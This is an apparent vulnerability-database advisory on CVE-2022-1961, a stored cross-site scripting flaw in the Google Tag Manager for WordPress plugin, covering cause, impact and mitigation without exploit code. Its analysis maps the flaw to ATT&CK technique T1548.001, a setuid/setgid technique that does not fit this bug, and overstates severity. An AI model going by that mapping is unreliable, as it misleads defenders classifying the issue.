CVE-2022-1961 in Google Tag Manager Plugin
Summary
by MITRE • 06/13/2022
The Google Tag Manager for WordPress (GTM4WP) plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping via the `gtm4wp-options[scroller-contentid]` parameter found in the `~/public/frontend.php` file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 1.15.1. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 04/08/2026
The vulnerability identified as CVE-2022-1961 affects the Google Tag Manager for WordPress plugin, specifically targeting versions up to and including 1.15.1. This stored cross-site scripting flaw resides within the frontend.php file where the `gtm4wp-options[scroller-contentid]` parameter fails to implement proper input sanitization. The vulnerability represents a critical security weakness that enables malicious actors with administrative privileges to inject arbitrary web scripts into the plugin's configuration parameters. The flaw is particularly concerning because it operates within the WordPress administration context, allowing attackers to execute malicious code within the browser environment of other users who access the affected sites.
The technical implementation of this vulnerability stems from inadequate output escaping and input validation practices within the plugin's parameter handling mechanism. When administrators modify the plugin settings through the WordPress admin interface, the `scroller-contentid` parameter value is not properly sanitized before being stored and subsequently rendered in the frontend output. This creates a persistent XSS vector where attacker-controlled script content can be stored in the database and executed whenever the affected page is loaded. The vulnerability specifically targets the WordPress multi-site configuration where unfiltered_html capabilities are restricted for administrative users, making it particularly dangerous in environments where security hardening measures are implemented.
The operational impact of this vulnerability extends beyond simple script injection, as it can enable attackers to perform various malicious activities including session hijacking, credential theft, and data exfiltration. The stored nature of the XSS vulnerability means that once an attacker successfully injects malicious code, it will persistently affect all users who access the compromised site until the malicious content is removed from the database. In multi-site installations, this vulnerability can potentially compromise multiple sites within the network, especially when administrators with elevated privileges are present. The security implications are further amplified because the vulnerability requires only administrative access to exploit, which is often a valuable target for attackers seeking persistent access to WordPress installations.
Mitigation strategies for CVE-2022-1961 should prioritize immediate plugin updates to versions that address the XSS vulnerability through proper input sanitization and output escaping mechanisms. Organizations should implement comprehensive monitoring of plugin configuration changes and conduct regular security audits of WordPress installations to identify unauthorized modifications. The vulnerability aligns with CWE-79 which specifically addresses cross-site scripting flaws, and follows ATT&CK technique T1548.001 for privilege escalation through malicious configuration modifications. Administrators should also consider implementing additional security measures such as restricting administrative access, enabling WordPress security plugins, and establishing proper input validation protocols for all user-controllable parameters within web applications. The affected plugin version should be immediately replaced with a patched version that implements proper sanitization of the `scroller-contentid` parameter before storage and rendering.